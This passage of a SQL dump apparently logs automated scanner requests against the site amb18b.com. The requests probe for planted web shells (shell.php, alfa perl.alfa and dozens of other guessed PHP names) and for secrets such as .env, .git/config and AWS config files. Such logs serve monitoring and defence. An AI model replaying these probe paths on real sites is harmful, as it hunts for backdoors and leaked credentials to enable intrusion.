19:49:01'),(6304,'https://amb18b.com/csv.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:03','2025-11-12 19:49:03'),(6305,'https://amb18b.com/shlo.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:05','2025-11-12 19:49:05'),(6306,'https://amb18b.com/abc.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:06','2025-11-12 19:49:06'),(6307,'https://amb18b.com/wpc1.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:07','2025-11-12 19:49:07'),(6308,'https://amb18b.com/ww.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:08','2025-11-12 19:49:08'),(6309,'https://amb18b.com/raw.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:10','2025-11-12 19:49:10'),(6310,'https://amb18b.com/mah.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:11','2025-11-12 19:49:11'),(6311,'https://amb18b.com/p.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:13','2025-11-12 19:49:13'),(6312,'https://amb18b.com/xpas22.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:14','2025-11-12 19:49:14'),(6313,'https://amb18b.com/wp1.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:15','2025-11-12 19:49:15'),(6314,'https://amb18b.com/fm.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:17','2025-11-12 19:49:17'),(6315,'https://amb18b.com/eauu.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:18','2025-11-12 19:49:18'),(6316,'https://amb18b.com/css.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:20','2025-11-12 19:49:20'),(6317,'https://amb18b.com/ru.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:21','2025-11-12 19:49:21'),(6318,'https://amb18b.com/tmpls.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:26','2025-11-12 19:49:26'),(6319,'https://amb18b.com/shell.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:27','2025-11-12 19:49:27'),(6320,'https://amb18b.com/ae.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:29','2025-11-12 19:49:29'),(6321,'https://amb18b.com/smpx.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:30','2025-11-12 19:49:30'),(6322,'https://amb18b.com/wp-asd.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:31','2025-11-12 19:49:31'),(6323,'https://amb18b.com/class5.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:32','2025-11-12 19:49:32'),(6324,'https://amb18b.com/yas.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:33','2025-11-12 19:49:33'),(6325,'https://amb18b.com/yanki.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:35','2025-11-12 19:49:35'),(6326,'https://amb18b.com/g7y.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:36','2025-11-12 19:49:36'),(6327,'https://amb18b.com/ok.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:37','2025-11-12 19:49:37'),(6328,'https://amb18b.com/yasnu.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:38','2025-11-12 19:49:38'),(6329,'https://amb18b.com/moon.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:39','2025-11-12 19:49:39'),(6330,'https://amb18b.com/wio.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:41','2025-11-12 19:49:41'),(6331,'https://amb18b.com/oswkk.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:42','2025-11-12 19:49:42'),(6332,'https://amb18b.com/rex.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:43','2025-11-12 19:49:43'),(6333,'https://amb18b.com/aj.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:44','2025-11-12 19:49:44'),(6334,'https://amb18b.com/snus.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:46','2025-11-12 19:49:46'),(6335,'https://amb18b.com/naxc.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:47','2025-11-12 19:49:47'),(6336,'https://amb18b.com/v3.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:48','2025-11-12 19:49:48'),(6337,'https://amb18b.com/nc4.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:49','2025-11-12 19:49:49'),(6338,'https://amb18b.com/api137.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:51','2025-11-12 19:49:51'),(6339,'https://amb18b.com/class629.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:52','2025-11-12 19:49:52'),(6340,'https://amb18b.com/wp-x7.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:53','2025-11-12 19:49:53'),(6341,'https://amb18b.com/wp670.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:54','2025-11-12 19:49:54'),(6342,'https://amb18b.com/Okxob.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:55','2025-11-12 19:49:55'),(6343,'https://amb18b.com/Sanskrit.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:57','2025-11-12 19:49:57'),(6344,'https://amb18b.com/jq.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:58','2025-11-12 19:49:58'),(6345,'https://amb18b.com/x7.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:59','2025-11-12 19:49:59'),(6346,'https://amb18b.com/zex.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:01','2025-11-12 19:50:01'),(6347,'https://amb18b.com/zxin.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:03','2025-11-12 19:50:03'),(6348,'https://amb18b.com/asd67.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:05','2025-11-12 19:50:05'),(6349,'https://amb18b.com/st.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:06','2025-11-12 19:50:06'),(6350,'https://amb18b.com/an.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:08','2025-11-12 19:50:08'),(6351,'https://amb18b.com/enkkk.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:09','2025-11-12 19:50:09'),(6352,'https://amb18b.com/ext.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:10','2025-11-12 19:50:10'),(6353,'https://amb18b.com/fe5.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:12','2025-11-12 19:50:12'),(6354,'https://amb18b.com/13.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:13','2025-11-12 19:50:13'),(6355,'https://amb18b.com/wp.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:14','2025-11-12 19:50:14'),(6356,'https://amb18b.com/wp-freya.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:16','2025-11-12 19:50:16'),(6357,'https://amb18b.com/hello.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:17','2025-11-12 19:50:17'),(6358,'https://amb18b.com/ex.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:19','2025-11-12 19:50:19'),(6359,'https://amb18b.com/lock1.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:20','2025-11-12 19:50:20'),(6360,'https://amb18b.com/mini.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:21','2025-11-12 19:50:21'),(6361,'https://amb18b.com/ups.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:23','2025-11-12 19:50:23'),(6362,'https://amb18b.com/bes.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:24','2025-11-12 19:50:24'),(6363,'https://amb18b.com/wp-swa.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:25','2025-11-12 19:50:25'),(6364,'https://amb18b.com/42u.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:27','2025-11-12 19:50:27'),(6365,'https://amb18b.com/lc.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:28','2025-11-12 19:50:28'),(6366,'https://amb18b.com/gmo.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:30','2025-11-12 19:50:30'),(6367,'https://amb18b.com/CLA.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:31','2025-11-12 19:50:31'),(6368,'https://amb18b.com/gfile.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:32','2025-11-12 19:50:32'),(6369,'https://amb18b.com/ahax.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:33','2025-11-12 19:50:34'),(6370,'https://amb18b.com/gold.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:35','2025-11-12 19:50:35'),(6371,'https://amb18b.com/ol.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:36','2025-11-12 19:50:36'),(6372,'https://amb18b.com/wp-gr.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:37','2025-11-12 19:50:37'),(6373,'https://amb18b.com/co.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:38','2025-11-12 19:50:38'),(6374,'https://amb18b.com/aua.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:40','2025-11-12 19:50:40'),(6375,'https://amb18b.com/aa.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:41','2025-11-12 19:50:41'),(6376,'https://amb18b.com/great.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:42','2025-11-12 19:50:42'),(6377,'https://amb18b.com/class9.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:43','2025-11-12 19:50:43'),(6378,'https://amb18b.com/pass.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:45','2025-11-12 19:50:45'),(6379,'https://amb18b.com/lock360.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:46','2025-11-12 19:50:46'),(6380,'https://amb18b.com/ot.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:47','2025-11-12 19:50:47'),(6381,'https://amb18b.com/witmm.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:49','2025-11-12 19:50:49'),(6382,'https://amb18b.com/lo.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:50','2025-11-12 19:50:50'),(6383,'https://amb18b.com/goods.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:51','2025-11-12 19:50:51'),(6384,'https://amb18b.com/chosen.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:53','2025-11-12 19:50:53'),(6385,'https://amb18b.com/vxrl.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:54','2025-11-12 19:50:54'),(6386,'https://amb18b.com/vxonb.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:56','2025-11-12 19:50:56'),(6387,'https://amb18b.com/wozxsh.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:58','2025-11-12 19:50:58'),(6388,'https://amb18b.com/whf.php','20.196.107.56','Direct Access',1,'2025-11-12 19:50:59','2025-11-12 19:50:59'),(6389,'https://amb18b.com/bkxzo.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:01','2025-11-12 19:51:01'),(6390,'https://amb18b.com/okxoby.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:02','2025-11-12 19:51:02'),(6391,'https://amb18b.com/error1.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:03','2025-11-12 19:51:03'),(6392,'https://amb18b.com/xtt.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:04','2025-11-12 19:51:04'),(6393,'https://amb18b.com/autoload_classmap.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:06','2025-11-12 19:51:06'),(6394,'https://amb18b.com/wcas.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:07','2025-11-12 19:51:07'),(6395,'https://amb18b.com/class-db.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:09','2025-11-12 19:51:09'),(6396,'https://amb18b.com/xxx.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:10','2025-11-12 19:51:10'),(6397,'https://amb18b.com/acp.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:11','2025-11-12 19:51:11'),(6398,'https://amb18b.com/awh77.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:13','2025-11-12 19:51:13'),(6399,'https://amb18b.com/nax.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:15','2025-11-12 19:51:15'),(6400,'https://amb18b.com/wolv2.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:16','2025-11-12 19:51:16'),(6401,'https://amb18b.com/mtvcrew.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:18','2025-11-12 19:51:18'),(6402,'https://amb18b.com/twso.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:19','2025-11-12 19:51:19'),(6403,'https://amb18b.com/144.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:20','2025-11-12 19:51:20'),(6404,'https://amb18b.com/exhitrgp.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:21','2025-11-12 19:51:21'),(6405,'https://amb18b.com/n3.php','20.196.107.56','Direct Access',1,'2025-11-12 19:51:23','2025-11-12 19:51:23'),(6406,'https://amb18b.com/graphql','157.245.36.108','Direct Access',1,'2025-11-12 22:16:56','2025-11-12 22:16:56'),(6407,'https://amb18b.com/api','157.245.36.108','Direct Access',1,'2025-11-12 22:16:57','2025-11-12 22:16:57'),(6408,'https://amb18b.com/api/graphql','157.245.36.108','Direct Access',1,'2025-11-12 22:16:57','2025-11-12 22:16:57'),(6409,'https://amb18b.com/graphql/api','157.245.36.108','Direct Access',1,'2025-11-12 22:16:58','2025-11-12 22:16:58'),(6410,'https://amb18b.com/api/gql','157.245.36.108','Direct Access',1,'2025-11-12 22:16:59','2025-11-12 22:16:59'),(6411,'https://amb18b.com/swagger-ui.html','157.245.36.108','Direct Access',1,'2025-11-12 22:17:00','2025-11-12 22:17:00'),(6412,'https://amb18b.com/swagger/index.html','157.245.36.108','Direct Access',1,'2025-11-12 22:17:00','2025-11-12 22:17:00'),(6413,'https://amb18b.com/swagger/swagger-ui.html','157.245.36.108','Direct Access',1,'2025-11-12 22:17:01','2025-11-12 22:17:01'),(6414,'https://amb18b.com/webjars/swagger-ui/index.html','157.245.36.108','Direct Access',1,'2025-11-12 22:17:02','2025-11-12 22:17:02'),(6415,'https://amb18b.com/swagger.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:02','2025-11-12 22:17:02'),(6416,'https://amb18b.com/swagger/v1/swagger.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:03','2025-11-12 22:17:03'),(6417,'https://amb18b.com/v2/api-docs','157.245.36.108','Direct Access',1,'2025-11-12 22:17:04','2025-11-12 22:17:04'),(6418,'https://amb18b.com/v3/api-docs','157.245.36.108','Direct Access',1,'2025-11-12 22:17:05','2025-11-12 22:17:05'),(6419,'https://amb18b.com/api-docs/swagger.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:06','2025-11-12 22:17:06'),(6420,'https://amb18b.com/api/swagger.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:07','2025-11-12 22:17:07'),(6421,'https://amb18b.com/@vite/env','157.245.36.108','Direct Access',1,'2025-11-12 22:17:07','2025-11-12 22:17:07'),(6422,'https://amb18b.com/actuator/env','157.245.36.108','Direct Access',1,'2025-11-12 22:17:08','2025-11-12 22:17:08'),(6423,'https://amb18b.com/server','157.245.36.108','Direct Access',1,'2025-11-12 22:17:09','2025-11-12 22:17:09'),(6424,'https://amb18b.com/.vscode/sftp.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:10','2025-11-12 22:17:10'),(6425,'https://amb18b.com/about','157.245.36.108','Direct Access',1,'2025-11-12 22:17:11','2025-11-12 22:17:11'),(6426,'https://amb18b.com/debug/default/view?panel=config','157.245.36.108','Direct Access',1,'2025-11-12 22:17:11','2025-11-12 22:17:11'),(6427,'https://amb18b.com/v2/_catalog','157.245.36.108','Direct Access',1,'2025-11-12 22:17:12','2025-11-12 22:17:12'),(6428,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','157.245.36.108','Direct Access',1,'2025-11-12 22:17:13','2025-11-12 22:17:13'),(6429,'https://amb18b.com/server-status','157.245.36.108','Direct Access',1,'2025-11-12 22:17:14','2025-11-12 22:17:14'),(6430,'https://amb18b.com/login.action','157.245.36.108','Direct Access',1,'2025-11-12 22:17:14','2025-11-12 22:17:14'),(6431,'https://amb18b.com/_all_dbs','157.245.36.108','Direct Access',1,'2025-11-12 22:17:15','2025-11-12 22:17:15'),(6432,'https://amb18b.com/.DS_Store','157.245.36.108','Direct Access',1,'2025-11-12 22:17:16','2025-11-12 22:17:16'),(6433,'https://amb18b.com/.env','157.245.36.108','Direct Access',1,'2025-11-12 22:17:17','2025-11-12 22:17:17'),(6434,'https://amb18b.com/.git/config','157.245.36.108','Direct Access',1,'2025-11-12 22:17:17','2025-11-12 22:17:17'),(6435,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','157.245.36.108','Direct Access',1,'2025-11-12 22:17:18','2025-11-12 22:17:18'),(6436,'https://amb18b.com/config.json','157.245.36.108','Direct Access',1,'2025-11-12 22:17:18','2025-11-12 22:17:18'),(6437,'https://amb18b.com/telescope/requests','157.245.36.108','Direct Access',1,'2025-11-12 22:17:19','2025-11-12 22:17:19'),(6438,'https://amb18b.com/info.php','157.245.36.108','Direct Access',1,'2025-11-12 22:17:20','2025-11-12 22:17:20'),(6439,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-11-13 00:09:59','2025-11-13 00:09:59'),(6440,'https://amb18b.com/wp-plain.php','172.207.123.72','Invalid Referrer',1,'2025-11-13 00:10:38','2025-11-13 00:10:38'),(6441,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-13 00:10:38','2025-11-13 00:10:38'),(6442,'https://amb18b.com/','172.207.123.72','Invalid Referrer',2,'2025-11-13 00:10:41','2025-11-13 00:10:40'),(6443,'https://amb18b.com/alfacgiapi/perl.alfa','172.207.123.72','Invalid Referrer',1,'2025-11-13 00:10:42','2025-11-13 00:10:42'),(6444,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.207.123.72','Direct Access',1,'2025-11-13 00:10:42','2025-11-13 00:10:42'),(6445,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.207.123.72','Direct Access',1,'2025-11-13 00:10:44','2025-11-13 00:10:44'),(6446,'https://amb18b.com/wp-plain.php','48.210.57.6','Invalid Referrer',1,'2025-11-13 01:27:07','2025-11-13 01:27:07'),(6447,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','48.210.57.6','Invalid Referrer',1,'2025-11-13 01:27:07','2025-11-13 01:27:07'),(6448,'https://amb18b.com/','48.210.57.6','Invalid Referrer',2,'2025-11-13 01:27:10','2025-11-13 01:27:09'),(6449,'https://amb18b.com/alfacgiapi/perl.alfa','48.210.57.6','Invalid Referrer',1,'2025-11-13 01:27:10','2025-11-13 01:27:10'),(6450,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','48.210.57.6','Direct Access',1,'2025-11-13 01:27:11','2025-11-13 01:27:11'),(6451,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','48.210.57.6','Direct Access',1,'2025-11-13 01:27:14','2025-11-13 01:27:14'),(6452,'https://amb18b.com/?p=1','142.44.225.189','Direct Access',1,'2025-11-13 04:20:40','2025-11-13 04:20:40'),(6453,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6%22','195.178.110.201','Direct Access',1,'2025-11-13 05:04:12','2025-11-13 05:04:12'),(6454,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6%22','195.178.110.201','Direct Access',1,'2025-11-13 05:04:14','2025-11-13 05:04:14'),(6455,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3%22','195.178.110.201','Direct Access',1,'2025-11-13 05:04:19','2025-11-13 05:04:19'),(6456,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1%22','195.178.110.201','Direct Access',1,'2025-11-13 05:04:23','2025-11-13 05:04:23'),(6457,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery.min.js?ver=3.7.1%22','195.178.110.201','Direct Access',1,'2025-11-13 05:04:27','2025-11-13 05:04:27'),(6458,'https://amb18b.com/.env','195.178.110.201','Direct Access',1,'2025-11-13 05:04:39','2025-11-13 05:04:39'),(6459,'https://amb18b.com/.git/config','195.178.110.201','Direct Access',1,'2025-11-13 05:04:41','2025-11-13 05:04:41'),(6460,'https://amb18b.com/backend/.env','195.178.110.201','Direct Access',1,'2025-11-13 05:04:44','2025-11-13 05:04:44'),(6461,'https://amb18b.com/admin/.env','195.178.110.201','Direct Access',1,'2025-11-13 05:04:49','2025-11-13 05:04:49'),(6462,'https://amb18b.com/core/.env','195.178.110.201','Direct Access',1,'2025-11-13 05:04:51','2025-11-13 05:04:51'),(6463,'https://amb18b.com/.env.bak','195.178.110.201','Direct Access',1,'2025-11-13 05:04:54','2025-11-13 05:04:54'),(6464,'https://amb18b.com/.git/logs/HEAD','195.178.110.201','Direct Access',1,'2025-11-13 05:04:56','2025-11-13 05:04:56'),(6465,'https://amb18b.com/.gitlab-ci.yml','195.178.110.201','Direct Access',1,'2025-11-13 05:05:00','2025-11-13 05:05:00'),(6466,'https://amb18b.com/config.json','195.178.110.201','Direct Access',1,'2025-11-13 05:05:02','2025-11-13 05:05:02'),(6467,'https://amb18b.com/config.js','195.178.110.201','Direct Access',1,'2025-11-13 05:05:05','2025-11-13 05:05:05'),(6468,'https://amb18b.com/aws-config.js','195.178.110.201','Direct Access',1,'2025-11-13 05:05:07','2025-11-13 05:05:07'),(6469,'https://amb18b.com/aws.config.js','195.178.110.201','Direct Access',1,'2025-11-13 05:05:10','2025-11-13 05:05:10'),(6470,'https://amb18b.com/xmlrpc.php','103.214.61.29','Direct Access',1,'2025-11-13 06:43:44','2025-11-13 06:43:44'),(6471,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:46','2025-11-13 06:54:46'),(6472,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/hooks.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:47','2025-11-13 06:54:47'),(6473,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/ui/core.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:48','2025-11-13 06:54:48'),(6474,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/i18n.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:48','2025-11-13 06:54:48'),(6475,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:49','2025-11-13 06:54:49'),(6476,'https://amb18b.com/wp-emoji-release.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:49','2025-11-13 06:54:49'),(6477,'https://amb18b.com/default.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:50','2025-11-13 06:54:50'),(6478,'https://amb18b.com//static.cloudflareinsights.com/beacon.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:50','2025-11-13 06:54:50'),(6479,'https://amb18b.com/default.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:52','2025-11-13 06:54:52'),(6480,'https://amb18b.com//static.cloudflareinsights.com/beacon.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:52','2025-11-13 06:54:52'),(6481,'https://amb18b.com/wp-emoji-release.min.js','54.167.207.206','Direct Access',1,'2025-11-13 06:54:53','2025-11-13 06:54:53'),(6482,'https://amb18b.com/postnews.php','15.235.145.161','Direct Access',1,'2025-11-13 07:44:15','2025-11-13 07:44:15'),(6483,'https://amb18b.com/.git/config','45.144.212.58','Direct Access',1,'2025-11-13 10:34:03','2025-11-13 10:34:03'),(6484,'https://amb18b.com/media/system/js/core.js','136.111.173.72','Direct Access',1,'2025-11-13 10:39:37','2025-11-13 10:39:37'),(6485,'https://amb18b.com//wp-includes/wlwmanifest.xml','136.112.162.135','Direct Access',1,'2025-11-13 11:54:35','2025-11-13 11:54:35'),(6486,'https://amb18b.com//?author=2','136.112.162.135','Direct Access',1,'2025-11-13 11:54:37','2025-11-13 11:54:37'),(6487,'https://amb18b.com//?author=3','136.112.162.135','Direct Access',1,'2025-11-13 11:54:38','2025-11-13 11:54:38'),(6488,'https://amb18b.com/postnews.php','216.24.219.228','Direct Access',1,'2025-11-13 12:22:07','2025-11-13 12:22:07'),(6489,'https://amb18b.com/wp-admin/postnews.php','104.234.19.117','Direct Access',1,'2025-11-13 12:22:14','2025-11-13 12:22:14'),(6490,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.82.228.232','Direct Access',1,'2025-11-13 14:00:20','2025-11-13 14:00:20'),(6491,'https://amb18b.com//?author=2','34.82.228.232','Direct Access',1,'2025-11-13 14:00:22','2025-11-13 14:00:22'),(6492,'https://amb18b.com/?p=1','142.44.220.195','Direct Access',1,'2025-11-13 14:32:22','2025-11-13 14:32:22'),(6493,'https://amb18b.com/.git/config','15.222.44.37','Direct Access',1,'2025-11-13 15:14:16','2025-11-13 15:14:16'),(6494,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:15','2025-11-13 15:31:15'),(6495,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/hooks.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:15','2025-11-13 15:31:15'),(6496,'https://amb18b.com//static.cloudflareinsights.com/beacon.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6497,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/ui/core.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6498,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/i18n.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6499,'https://amb18b.com/default.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6500,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6501,'https://amb18b.com/wp-emoji-release.min.js','34.221.123.171','Direct Access',1,'2025-11-13 15:31:16','2025-11-13 15:31:16'),(6502,'https://amb18b.com/wordpress/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:18','2025-11-13 16:16:18'),(6503,'https://amb18b.com/blog/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:20','2025-11-13 16:16:20'),(6504,'https://amb18b.com/old/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:23','2025-11-13 16:16:23'),(6505,'https://amb18b.com/backup/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:24','2025-11-13 16:16:24'),(6506,'https://amb18b.com/wp/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:25','2025-11-13 16:16:25'),(6507,'https://amb18b.com/new/','35.237.219.228','Direct Access',1,'2025-11-13 16:16:26','2025-11-13 16:16:26'),(6508,'https://amb18b.com/style.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:15','2025-11-13 17:20:15'),(6509,'https://amb18b.com/wp-admin/style.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:21','2025-11-13 17:20:21'),(6510,'https://amb18b.com/wp-includes/style.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:23','2025-11-13 17:20:23'),(6511,'https://amb18b.com/chosen.php?p=','103.186.31.45','Direct Access',1,'2025-11-13 17:20:25','2025-11-13 17:20:25'),(6512,'https://amb18b.com/file.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:27','2025-11-13 17:20:27'),(6513,'https://amb18b.com/flower.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:29','2025-11-13 17:20:29'),(6514,'https://amb18b.com/gifclass.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:31','2025-11-13 17:20:31'),(6515,'https://amb18b.com/bless.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:33','2025-11-13 17:20:33'),(6516,'https://amb18b.com/class-t.api.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:35','2025-11-13 17:20:35'),(6517,'https://amb18b.com/blurbs.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:37','2025-11-13 17:20:37'),(6518,'https://amb18b.com/akcc.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:39','2025-11-13 17:20:39'),(6519,'https://amb18b.com/abcd.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:41','2025-11-13 17:20:41'),(6520,'https://amb18b.com/aku.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:43','2025-11-13 17:20:43'),(6521,'https://amb18b.com/cord.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:45','2025-11-13 17:20:45'),(6522,'https://amb18b.com/dex.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:47','2025-11-13 17:20:47'),(6523,'https://amb18b.com/zoo.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:51','2025-11-13 17:20:51'),(6524,'https://amb18b.com//zwso.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:53','2025-11-13 17:20:53'),(6525,'https://amb18b.com/wp-admin/zwso.php','103.186.31.45','Direct Access',1,'2025-11-13 17:20:56','2025-11-13 